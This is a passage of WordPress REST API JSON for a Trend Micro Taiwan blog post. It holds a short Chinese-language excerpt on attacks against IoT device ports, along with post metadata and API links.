Sembera\uff09<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5c0d\u8a31\u591a\u7269\u806f\u7db2\uff08IoT ,Internet of Thing\uff09\u4f7f\u7528\u8005\u4f86\u8aaa\uff0c\u88dd\u7f6e\u7aef\u53e3\u906d\u53d7\u653b\u64ca\u4e00\u76f4\u662f\u500b\u554f\u984c\u3002\u7279\u5225\u662fT [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[17,1335,11,15],"tags":[2274,1599,3658,1852,23,1593],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/56442"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56442"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/56442\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56442"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}